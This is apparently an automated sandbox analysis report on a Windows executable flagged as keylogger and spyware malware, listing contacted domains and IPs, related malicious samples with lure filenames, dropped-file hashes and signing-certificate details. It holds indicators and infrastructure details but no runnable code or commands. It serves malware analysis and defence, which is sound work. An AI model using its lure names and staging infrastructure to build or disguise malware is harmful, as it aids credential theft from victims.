http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034CB1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://reallyfreegeoip.org/xml/ | z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034D78000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
142.251.111.132 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
142.251.167.113 | drive.google.com | United States | 15169 | GOOGLEUS | false
158.101.44.242 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false
172.67.177.134 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENETUS | true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1480054
Start date and time: 2024-07-24 14:42:36 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 16m 14s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name: Suspected Instruction Hammering
Number of new started processes analysed: 132
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: z1QuotationSheetVSAA6656776.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@408/13@4/4
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 169
• Number of non-executed functions: 118
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Exclude process from analysis (whitelisted): dllhost.exe, backgroundTaskHost.exe
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Report size getting too big, too many NtWriteVirtualMemory calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: z1QuotationSheetVSAA6656776.exe
                      No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
158.101.44.242 | rcrypt.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
158.101.44.242 | rRFQ_025261-97382.exe | malicious | Snake Keylogger | checkip.dyndns.org/
158.101.44.242 | SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtf | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
158.101.44.242 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.25886.26681.rtf | malicious | Snake Keylogger | checkip.dyndns.org/
158.101.44.242 | List & Sample_Doc3.exe | malicious | GuLoader, Snake Keylogger | checkip.dyndns.org/
158.101.44.242 | Apixaban - August 2024.XLS.exe | malicious | Snake Keylogger | checkip.dyndns.org/
158.101.44.242 | KQtHehIECg.exe | malicious | Snake Keylogger | checkip.dyndns.org/
158.101.44.242 | Bank Slip.pdf.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
158.101.44.242 | NATV0980090004.scr.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
158.101.44.242 | QUOTATION_JULQTRA071244#U00faPDF.scr.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
172.67.177.134 | z65PurchaseOrderNo_0072024_pdf.exe | malicious | GuLoader, Snake Keylogger |
172.67.177.134 | rSWIFT.exe | malicious | GuLoader, Snake Keylogger |
172.67.177.134 | Revised PI_2024.exe | malicious | GuLoader, Snake Keylogger |
172.67.177.134 | z46PEDIDODECOMPRAURGENTE___F__D__P___.exe | malicious | Snake Keylogger |
172.67.177.134 | z13FAT9654578987.exe | malicious | PureLog Stealer, Snake Keylogger |
172.67.177.134 | GF87654000.BAT.exe | malicious | PureLog Stealer, Snake Keylogger |
172.67.177.134 | NOVO_PEDIDO_DE_COMPRA_____pdf.exe | malicious | Snake Keylogger |
172.67.177.134 | e-dekont.exe | malicious | PureLog Stealer, Snake Keylogger |
172.67.177.134 | U prilogu je nova lista narudzbi.exe | malicious | Snake Keylogger |
172.67.177.134 | list of items.exe | malicious | PureLog Stealer, Snake Keylogger |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
checkip.dyndns.com | rcrypt.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 158.101.44.242
checkip.dyndns.com | rRFQ_025261-97382.exe | malicious | Snake Keylogger | 158.101.44.242
checkip.dyndns.com | SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtf | malicious | Snake Keylogger, VIP Keylogger | 132.226.247.73
checkip.dyndns.com | Purchase Order POT-247110.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 132.226.247.73
checkip.dyndns.com | SecuriteInfo.com.Trojan.PackedNET.2944.2376.13684.exe | malicious | Snake Keylogger | 132.226.8.169
checkip.dyndns.com | SecuriteInfo.com.Exploit.CVE-2017-11882.123.25886.26681.rtf | malicious | Snake Keylogger | 193.122.6.168
checkip.dyndns.com | Purchase Order.exe | malicious | DarkTortilla, Snake Keylogger | 132.226.247.73
checkip.dyndns.com | List & Sample_Doc3.exe | malicious | GuLoader, Snake Keylogger | 158.101.44.242
checkip.dyndns.com | Confirmation transfer Copy AGS # 24-00379.exe | malicious | GuLoader, Snake Keylogger | 193.122.6.168
checkip.dyndns.com | Apixaban - August 2024.XLS.exe | malicious | Snake Keylogger | 158.101.44.242
reallyfreegeoip.org | rcrypt.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 188.114.96.3
reallyfreegeoip.org | SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtf | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
reallyfreegeoip.org | Purchase Order POT-247110.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
reallyfreegeoip.org | SecuriteInfo.com.Trojan.PackedNET.2944.2376.13684.exe | malicious | Snake Keylogger | 188.114.96.3
reallyfreegeoip.org | SecuriteInfo.com.Exploit.CVE-2017-11882.123.25886.26681.rtf | malicious | Snake Keylogger | 188.114.96.3
reallyfreegeoip.org | Purchase Order.exe | malicious | DarkTortilla, Snake Keylogger | 188.114.96.3
reallyfreegeoip.org | List & Sample_Doc3.exe | malicious | GuLoader, Snake Keylogger | 188.114.97.3
reallyfreegeoip.org | Confirmation transfer Copy AGS # 24-00379.exe | malicious | GuLoader, Snake Keylogger | 188.114.97.3
reallyfreegeoip.org | Apixaban - August 2024.XLS.exe | malicious | Snake Keylogger | 188.114.96.3
reallyfreegeoip.org | SMLCHtAAMK.exe | malicious | Snake Keylogger | 188.114.97.3
Match | Associated Sample Name / URL | Detection | Threat Name | Context

Match: ORACLE-BMC-31898US
  rcrypt.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 158.101.44.242
  rRFQ_025261-97382.exe | malicious | Snake Keylogger | 158.101.44.242
  SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtf | malicious | Snake Keylogger, VIP Keylogger | 158.101.44.242
  Purchase Order POT-247110.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.130.0
  SecuriteInfo.com.Exploit.CVE-2017-11882.123.25886.26681.rtf | malicious | Snake Keylogger | 158.101.44.242
  List & Sample_Doc3.exe | malicious | GuLoader, Snake Keylogger | 158.101.44.242
  Confirmation transfer Copy AGS # 24-00379.exe | malicious | GuLoader, Snake Keylogger | 193.122.6.168
  Apixaban - August 2024.XLS.exe | malicious | Snake Keylogger | 158.101.44.242
  SMLCHtAAMK.exe | malicious | Snake Keylogger | 193.122.130.0
  KQtHehIECg.exe | malicious | Snake Keylogger | 158.101.44.242

Match: CLOUDFLARENETUS
  rcrypt.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 188.114.96.3
  Fw PROPOSITION DE BELGOSUC.eml | malicious | SharepointPhisher | 188.114.97.3
  roquette.com PURCHASE ORDER.htm | malicious | Unknown | 188.114.96.3
  ELECTRONIC RECEIPTGrba.html | malicious | Unknown | 188.114.96.3
  https://www.canva.com/design/DAGL1KVwhx0/GKVImkBFgqHp2esQ4hZ4Gg/edit | malicious | Unknown | 172.67.74.152
  Sync_Approval_Document.html | malicious | HTMLPhisher | 104.17.25.14
  http://relsoftware.com | malicious | HTMLPhisher | 104.18.20.138
  25C1.exe | malicious | Glupteba, Xmrig | 104.20.3.235
  https://forms.office.com/r/tV6LkCsNt1 | malicious | Unknown | 104.18.36.155
  abrirpdf_45868.msi | malicious | HTMLPhisher | 172.67.150.91
Match | Associated Sample Name / URL | Detection | Threat Name | Context

Match: 3b5074b1b5d032e5620f69f9f700ff0e
  rcrypt.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 172.67.177.134
  roquette.com PURCHASE ORDER.htm | malicious | Unknown | 172.67.177.134
  nJC3400-GS SICO NEW ORLEANS.pif.exe | malicious | Unknown | 172.67.177.134
  abrirpdf_45868.msi | malicious | HTMLPhisher | 172.67.177.134
  231210-06-AgentTesla-9da180.exe | malicious | AgentTesla | 172.67.177.134
  231210-04-AgentTesla-38a0d6.exe | malicious | AgentTesla | 172.67.177.134
  1E7BF321ECF78820F9422AD944E55288C5DBF0787DDAFD97120791A0DBBCE80A.exe | malicious | Unknown | 172.67.177.134
  Purchase Order POT-247110.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 172.67.177.134
  https://jf8nnsk.vk.com////away.php?to=https://brandequity.economictimes.indiatimes.com/etl.php?url=drarclimatizacao.com.br/dayo/tp5ri/VmFuZGVuYnVsY2tlLkFsZXhpc0BkZW1lLWdyb3VwLmNvbQ==$%C3%A3%E2%82%AC%E2%80%9A | malicious | HTMLPhisher | 172.67.177.134
  https://valid-check-tl-3.azurewebsites.net | malicious | Unknown | 172.67.177.134

Match: 37f463bf4616ecd445d4a1937da06e19
  rRSFREVISEDINVOICE.exe | malicious | GuLoader | 142.251.111.132, 142.251.167.113
  rRSFREVISEDINVOICE.exe | malicious | GuLoader | 142.251.111.132, 142.251.167.113
  1f4ef767f0144f8b485bc6ef31247f6b95f68df95a649d9902f885e79408e114.exe | malicious | Babuk, Bdaejec, Djvu | 142.251.111.132, 142.251.167.113
  1887D44BD913B81D9943F4B5637E01B057D20D757B23CD6EA3DA239827A9CD95.exe | malicious | Babuk, Bdaejec, Djvu | 142.251.111.132, 142.251.167.113
  ykuOk5seZe.exe | malicious | Unknown | 142.251.111.132, 142.251.167.113
  17C1844F37315D9081EFA1C39ABCDB3612C531DCF01C303425346DD352A3B117.exe | malicious | Babuk, Bdaejec, Djvu | 142.251.111.132, 142.251.167.113
  17A21C03CDA1D7443CA4BEF3A410BC88B544B55E28088A3AE550AEBC517BEA35.exe | malicious | Babuk, Bdaejec, Djvu | 142.251.111.132, 142.251.167.113
  1631E2571D7E0EBF784A263FE72777450189800806D145C4937492DFCB55F2D5.exe | malicious | Babuk, Bdaejec, Djvu | 142.251.111.132, 142.251.167.113
  Ia93PTYivQ.exe | malicious | BlackMoon, Neshta | 142.251.111.132, 142.251.167.113
  vh6X1dStma.exe | malicious | Unknown | 142.251.111.132, 142.251.167.113
Match | Associated Sample Name / URL | Detection | Threat Name

Match: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll
  CdB3FZ9vyI.exe | malicious | Unknown
  z65PurchaseOrderNo_0072024_pdf.exe | malicious | GuLoader, Snake Keylogger
  z65PurchaseOrderNo_0072024_pdf.exe | malicious | GuLoader
  Nondesistance.exe | malicious | FormBook, GuLoader
  Nondesistance.exe | malicious | GuLoader
  Platosammine.exe | malicious | FormBook, GuLoader
  FRA.0038222.exe | malicious | FormBook, GuLoader
  Platosammine.exe | malicious | GuLoader
  FRA.0038222.exe | malicious | GuLoader

Match: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\nsExec.dll
  z65PurchaseOrderNo_0072024_pdf.exe | malicious | GuLoader, Snake Keylogger
  z65PurchaseOrderNo_0072024_pdf.exe | malicious | GuLoader
  SecuriteInfo.com.Gen.Variant.Nemesis.10604.10132.22073.exe | malicious | AgentTesla, GuLoader
  SecuriteInfo.com.Gen.Variant.Nemesis.10604.10132.22073.exe | malicious | GuLoader
  SecuriteInfo.com.Gen.Variant.Nemesis.10604.16795.26223.exe | malicious | AgentTesla, GuLoader
  SecuriteInfo.com.Gen.Variant.Nemesis.10604.16795.26223.exe | malicious | GuLoader
  SecuriteInfo.com.Gen.Variant.Nemesis.10604.26230.20747.exe | malicious | AgentTesla, GuLoader
  SecuriteInfo.com.Gen.Variant.Nemesis.10604.19295.24537.exe | malicious | AgentTesla, GuLoader
  SecuriteInfo.com.Gen.Variant.Nemesis.10604.26230.20747.exe | malicious | GuLoader

Process: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe
File Type: data
Category: dropped
Size (bytes): 569387
Entropy (8bit): 1.2576295922522882
Encrypted: false
SSDEEP: 1536:OVASKUA3NpWyq9DZujnIJ+mokF0WzE4M9MeBELQiF6tPa:UUUAd8yqvy85w42MyIQiY
MD5: AE1308833F720D75F2C304BE4B6AF6BD
SHA1: 0DCB3E7900E151ADDA29B07C1C46CEDFCB65555D
SHA-256: 288723F9781B40C4212C684938A065D765E21199CA8EDB7BBA3851120FB9B16D
SHA-512: E2FC0EAFAA8DC2CAFC3C4007FE7BFEB6872A2DBAF620D6ECAC62F8E489C462748AF3685B1B822CB66A31EC425DEBFBF9BE4EEC7FA527F58607D4CB1B7FCBD256
Malicious: false
                                                                              Preview:...............................................u......................................................K........................2...........o...............o.....................................2...........................................................7............................................................................$.....2.......................................................g..........................................................................................................h.....n............$.................................X.................................................=............E...........O....................................................................................................................................................................................................3................................................................................H...................................\.................................+...G.....L..............

Process: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe
File Type: data
Category: dropped
Size (bytes): 517647
Entropy (8bit): 1.2525511679320935
Encrypted: false
SSDEEP: 1536:RnfKh/fMno7kmNB/MVHaozk5pxqhdLSwP+j6v368E2fanzuM:gpfYJi9MgoA56duUfKZ
MD5: 6818DA35D99574965581C79EEF751091
SHA1: 97CBB5F773C5BC7E2079AF539C1A6309BFA6B101
SHA-256: EAF29630020676A421E576BF3456B364B13C9F821A9817136F60F68F765E6869
SHA-512: 80CBEF3D59309B73E8126FA8CB9F5D781B7768D5E91C9232D648050B9F1A197EFC42689679545BD82C28ABA1D8EDE1247A656E2185552D7A1DE624BFBD564244
Malicious: false
                                                                              Preview:..................................z............7.................................=......................K.................................................................................[....................................}.............L........................................................"...........................................................................u................................M......................................................P............................$.........................N..................................................^....................B......[.t...............2.....U..........,.................................n......................................f.........................../............................H....../...G.........Y.....|..................................................2.$....:............................7..............r......................................g..............O..+.......................................(..............

Process: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe
File Type: data
Category: dropped
Size (bytes): 569548
Entropy (8bit): 1.2494786298549982
Encrypted: false
SSDEEP: 768:kmzb0dG4lgsuXoSuHz6AHMS2yXGwBsRH5U7uzrN2R1pFGatwfoKCN73Ms+5CWiH7:k2bCuu2ylIScQ744CwWiFNXv4Lf6dz
MD5: 16EB64C7F3F4C4059920FCF08E836C66
SHA1: E6315CC7261E67718C5C9E4ACAD98BF4122AD785
SHA-256: 6054328E283DB7F1F165C773DAC047B429179CB51E8B16E4D04131D4747245FE
SHA-512: 1304C1DBAE579A1CCD9F231A191F96B42C48C82ECB79AAE61CB8CE0F84BEB1A2359500E4E297653B343F4623FC3EFF21DCD0756890FDF221038AF187DB182D3C
Malicious: false
                                                                              Preview:T....................(..........................!.X...............................................................................................%..m.|....._.......................P...........................................b......................................................................................................................................................................"...........................y................................................................3.................................................................................................................k........................................................................................*..........b................................................`..................................d.............................k.. ..c....A..............................$........[................................................'............^....@..e.,.................h..........................................

Process: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe
File Type: data
Category: dropped
Size (bytes): 9485
Entropy (8bit): 4.720175957025076
Encrypted: false
SSDEEP: 192:R5WX7IWhJa8zXbpuqlroIrz78j5hoi+vG:PBfyblrLz7K7++
MD5: D13BD1AB08F91817D8E99CE3195C8ACF
SHA1: 73107E7AB1B790748F52DD1DEFA4CB9BAB00B4AF
SHA-256: 449D2FD5F91013745AC0E256DB5EB29FB1FE3B9FAB339A3C22484CD755D3D628
SHA-512: 6983719348F5799352621012C6F05035C033756214CCFCEEBA00495E6B534A63AE2FB191C66D53985E456A5C415D98F30E6012DEB53D63B1C9C2F0A639FDD531
Malicious: false
                                                                              Preview:...n..ff..........JJ...aaaa.^^........m.......~.........>....\\.......22..................................................................................................................................................................................................................................................................C..........................o........''....gg.w....\\.R..........r...........55..$...........++.....!!..ee....`....yyyy.....=.jj.....@....1.....................PP...g.!............................................cc........++......^.....11...q.,,,,..<.....BB................^^^......ww.........{{{{{.E.....III..................l.................77...n................""""...............+..##....~._..................i........................=.........L.\\\\\....T..........).....2...!!...........................[..@@@..............qq.r.y....@@@...NNN........h...!!.........R.ll.........................bb......k.D............

Process: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe
File Type: data
Category: dropped
Size (bytes): 146499
Entropy (8bit): 7.7927314794736535
Encrypted: false
SSDEEP: 3072:9tRR+B7BTwOqysKul+0C5vD0C4lYGsfsjoyX572jF/WxYhDJrI99VeM:9tREUTJK+bCpdL5yXc/hDJrINeM
MD5: 8F81EC4D5FD356697EAB164400D97904
SHA1: 6CC7424F756436A8A7638462CB3D08DC8BF32A3C
SHA-256: 084BA80FFEAA2B5FD048D280AE0EFFB5192E94C7E4A8362008681B2F69AB49C1
SHA-512: F9A3891EA4D763FA4BB51EF9208433370851FA1A77CC65A04A3216DC3EA7EEA9B2A1F0D5D84601BE73E89A7A0C823B63A8AA514A7016D0FBD8CEF66E0699A357
Malicious: false
                                                                              Preview:.........................................______.........}..A.......UU..............UUU.,,................I....22......................b..................................___..B.......PPPP....~~.......////........ZZ...bbb.>>.....-...((.........``..............Z.O...HH............mmmmmm..]]].......ccccccc.........JJ........u.)....{{{{............f.....6........^^......U..|......=......}}}..............XXX.........<<<<<...................f........."""............KK.HHH..........................................F.................Z.........TT.UU...........VV.........dd.V...........[........}}......L.................................L..............k.......DDD...................... ..S.....XEa1........^-8D...f!...X..........M.........3..f..........8.......S.......X....................O...f.......:...j.....w.LWf.........fFf........."Mmf.........(....,...F.T...f..f...f...1.f.................f.............."...|..........4....%.......[t.........@Lmf!.f......[f.......P.{..........f!..

Process: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe
File Type: data
Category: dropped
Size (bytes): 206364
Entropy (8bit): 1.2628204353333041
Encrypted: false
SSDEEP: 768:ZA50xvMWCWcud/wYE7p7I6vi07muXRIqCBIjswyYLdzFcDMrmksocCVjBeVVoW4O:r7WVNhmKCVJZd
MD5: 7F52A962B3B5AAC02D5CD0209E3B144B
SHA1: 888E7656A230C23E3244C7E3C70DAE783C7BB6EB
SHA-256: 58207F67AEC92E2761E63F18230DEEDDDF6220967DEC97366153AE0DA1FB099A
SHA-512: 25DF4136AAEB35AE3EB9A3453510CF0D0E68FA1CD50D62D3CC8253F042306C96731FC745D90EC02F856548E49CD2C550D41EB73B674BE1EB84FF8C9E4F5CF674
Malicious: false
                                                                              Preview:.....................@.l...................................................................................................O........~..........................................I......................c........._....................................................................................r..........F.................................................t....".....................c...B.....3..2..................................v5................+.............7.....=..............................................................o............................................"_............................X........V........;...h...................................................................z..................................................................................................@.................................@.................L......s................=....w.............n....................................R.................................................D?......................

Process: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe
File Type: data
Category: dropped
Size (bytes): 588680
Entropy (8bit): 1.2508475671741555
Encrypted: false
SSDEEP: 1536:4DQsKOvC67yLN4LsH1rsLkM83TRpPYu2fewLx6j773Hek2C1NRI6apWIT:WQX4499DPYXfB6feINqfWIT
MD5: C57C7EA70544ABC867F12AA26079B31A
SHA1: DF41E9E12110B8502C494A56797F4267F455846C
SHA-256: 5B6CCEFAFE9BA6599A43E50E029A43DEFA42A987E54DED8B1CE0A570F822ED68
SHA-512: A6DC8FE158BFD93E04FC20FBB57627D4380C418636F7E52B1A4AF6BBB07EF00053750F640416317100B753496D1E11F41ABEC3C49F5800E0A78BBBC2867A793E
Malicious: false
                                                                              Preview:...................................}........................................................................................................................T.........................................................................m..............S.9............................\................................_.........................................`.........H................&..........?........................=...G...................<....................q........v............H.....................................................................7..................J................6..............n......................e.................................5...........h.....................6...Y.................K.....................................................................................................................................".....Z.W..%...............*....M.....................................P.........................=.....................................................

Process: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe
File Type: data
Category: dropped
Size (bytes): 344232
Entropy (8bit): 1.254493541267648
Encrypted: false
SSDEEP: 768:ZRFBvSEeIfI+jhAp/TBFv1B0BzwSpqSZqvpLpOvDWxuc6NPapZKZjF4vWlBs87Y7:BFjmp7X0XpI9Daip8rm48+23XPz1a2
MD5: 761EC0683CA47C3BB4D3C4AF622644A7
SHA1: 57CD94F92B74A9AC54C2CCE6ABCE67CE20DFF5CD
SHA-256: E6535A5C8A3321B1212687AB850DA5698EBC673B8E6D6D2516573477E64F3811
SHA-512: 6759610803BD9D55F72E56AB229F397D9E9DEFBB0F18213EB3032A35EF9C30092B271C23FB6E4D476279C6F7B3E438067C1740FBE22C26EBAAB08C9AC9EE79E2
Malicious: false
                                                                              Preview:A.......................................................................1.................................................................................5..............................G......................B.........:......c.............R...............p.............. ....n.........................0............P..................(....`............................k..............$.........................t...@............C.......................................e...............,....>......l....`..........................e.....M......Hx......................................C........................1........... ...............;...................Z...............B......................).........................g................:....E.............a.................N..,...........................n..=.....^..............................................C............................v.....................................A.....E...........................%...<l....................................

Process: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe
File Type: data
Category: dropped
Size (bytes): 581301
Entropy (8bit): 1.2594641165832554
Encrypted: false
SSDEEP: 768:7rupsSYNpmpQVMQnP/BMsr/uDEvzM7ziWxw+Ol/f3uEJPzuzFDBMuT00m/X7XWFZ:7+HpJ5QoROK3V1dYARYA4UGqz/h6q
MD5: 73AA71573572EA83DD24EAD3D6B59C1E
SHA1: 9981C6A285C5A481C641F5C5ED2D93D69C72A96A
SHA-256: 3BF351ED62782F6625C87E0F47C81F9F72F5533FC3768043AF403E5D1DCA4941
SHA-512: B8A5CC6BB7524E1341ACB6119EC41A22A9610E0E8226AB7A37CA77F3C30A3E9B873EE64F770C6B44E1D9767399EADBB485CF80602AA2624456FB90A532C7850E
Malicious: false

Process: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe
File Type: data
Category: dropped
Size (bytes): 232808
Entropy (8bit): 1.2556661242362008
Encrypted: false
SSDEEP: 1536:N+we1H9s03v/TTDeoOwB5/x9Bb6Al2Bld:N+we9vrTGwf8+g7
MD5: 36AD39699D00721662CFE9AB72D42009
SHA1: F116D6F8CEE991DC10B529A9FE7700FA53F1A1F8
SHA-256: 793778370E425C06D61FBE536EB8336AB72ABBC7BF4BA828E1F28EEA2C73953B
SHA-512: 2337ED4C7A26DCCDF2710930EA93591DE9F965C9C86B8454A12FB56E389FE7A73FDCCBA9A2C2C4099EE0A1F9B3683A6D4493F85AB87AB31ECA5AD8FE023D6D5F
Malicious: false

Process: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe
File Type: data
Category: dropped
Size (bytes): 3792017
Entropy (8bit): 1.6735737622723097
Encrypted: false
SSDEEP: 12288:wtRlVKGQL5yc/pJrIISuv2jZdMqfC/WYps4GXksRqZvb:VGGUWIIv2jZdJfC//PGXksRmvb
MD5: 593438012F454BD48F1B722D38AA0F2D
SHA1: 71AFCE9608A0F93DA5896BE4863D9AAE298C0A6A
SHA-256: 4134FBAFDB523ACEAE1947D35B27987EDF59EED284ABF7D988DECD3B74C689FF
SHA-512: D4E4BFF8857081D994E9950EC43B4E30BFAC3E4966E9AA39A11D7D62E571D636AEF70097E10D4F63579FBB5AD605249F3C5420D57CA04D256A54920AD511F4B4
Malicious: false

Process: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 11264
Entropy (8bit): 5.770824470205811
Encrypted: false
SSDEEP: 192:PPtkumJX7zB22kGwfy0mtVgkCPOs81un:E702k5qpds8Qn
MD5: B8992E497D57001DDF100F9C397FCEF5
SHA1: E26DDF101A2EC5027975D2909306457C6F61CFBD
SHA-256: 98BCD1DD88642F4DD36A300C76EBB1DDFBBBC5BFC7E3B6D7435DC6D6E030C13B
SHA-512: 8823B1904DCCFAF031068102CB1DEF7958A057F49FF369F0E061F1B4DB2090021AA620BB8442A2A6AC9355BB74EE54371DC2599C20DC723755A46EDE81533A3C
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: CdB3FZ9vyI.exe, Detection: malicious
• Filename: z65PurchaseOrderNo_0072024_pdf.exe, Detection: malicious
• Filename: z65PurchaseOrderNo_0072024_pdf.exe, Detection: malicious
• Filename: Nondesistance.exe, Detection: malicious
• Filename: Nondesistance.exe, Detection: malicious
• Filename: Platosammine.exe, Detection: malicious
• Filename: FRA.0038222.exe, Detection: malicious
• Filename: Platosammine.exe, Detection: malicious
• Filename: FRA.0038222.exe, Detection: malicious

Process: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 6656
Entropy (8bit): 4.994709916818556
Encrypted: false
SSDEEP: 96:kD7GUxNkO6GR0t9GKKr1Zd8NHYVVHp4dEeY3kRnHdMqqyVgNe43e:kPXhHR0aTQN4gRHdMqJVgNef
MD5: AE164B9DD3591A987B0D71DC255C4654
SHA1: 41198CB28A31A0FFC3D14540E61A4840800681CC
SHA-256: 7FAFAF28FA6EB7604C61EF816CDD3E5097A0E17695BEF0BF9116B6558AA68967
SHA-512: 57FAD70B175FA4F1A525FE413C8BCD87CD66B97053056C91CA912E6796AD19CC613437F49C52ADF5CA20C2C54F4C0EF2A41DF50CFABE0645DE7E6016B5CD05F6
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: z65PurchaseOrderNo_0072024_pdf.exe, Detection: malicious
• Filename: z65PurchaseOrderNo_0072024_pdf.exe, Detection: malicious
• Filename: SecuriteInfo.com.Gen.Variant.Nemesis.10604.10132.22073.exe, Detection: malicious
• Filename: SecuriteInfo.com.Gen.Variant.Nemesis.10604.10132.22073.exe, Detection: malicious
• Filename: SecuriteInfo.com.Gen.Variant.Nemesis.10604.16795.26223.exe, Detection: malicious
• Filename: SecuriteInfo.com.Gen.Variant.Nemesis.10604.16795.26223.exe, Detection: malicious
• Filename: SecuriteInfo.com.Gen.Variant.Nemesis.10604.26230.20747.exe, Detection: malicious
• Filename: SecuriteInfo.com.Gen.Variant.Nemesis.10604.19295.24537.exe, Detection: malicious
• Filename: SecuriteInfo.com.Gen.Variant.Nemesis.10604.26230.20747.exe, Detection: malicious

File type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit): 7.737887650723092
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: z1QuotationSheetVSAA6656776.exe
File size: 1'009'096 bytes
MD5: cfb41760f84e1e70bade0ca7394d424b
SHA1: 139d1068c52255526ec38fe7ce0c48c365492712
SHA256: a2be0d024f1ed07193631fd4bcf91b224685a2624a3396dedbed5d071c29889f
SHA512: 4e139676847190c84d85888dee0d2e00587179af2aef0e74ba007e772d45093116523ac1f294ad97a1c070633808f51807d4b52a9d2530a81f7e370ffe0949f9
SSDEEP: 24576:q/y/rgmCvgaqDn+gQ2XHDY3hCUsdiXdjwsTHvsqakWLCWQj:q/y/rgmx+gQy0xCUssX5wqvsDRCj
TLSH: 60251233BA2187B6DAAC4B35497A85248FA0EC733D71A31FBB08F6561F321F24419579
Icon Hash: 051850d898713163
Entrypoint: 0x40322b
Entrypoint Section: .text
Digitally signed: true
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x57017AAD [Sun Apr 3 20:18:53 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 4f67aeda01a0484282e8c59006b0b352
Signature Valid: false
Signature Issuer: E=Sociocrat@Screwballs.Be, O=Resurges, OU="Trkgardiner Heteromastigate ", CN=Resurges, L=Denniston, S=Kentucky, C=US
Signature Validation Error: A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number: -2146762487
Validity period:
• Not Before: 23/06/2024 02:48:22, Not After: 23/06/2027 02:48:22
Subject Chain:
• E=Sociocrat@Screwballs.Be, O=Resurges, OU="Trkgardiner Heteromastigate ", CN=Resurges, L=Denniston, S=Kentucky, C=US
Version: 3
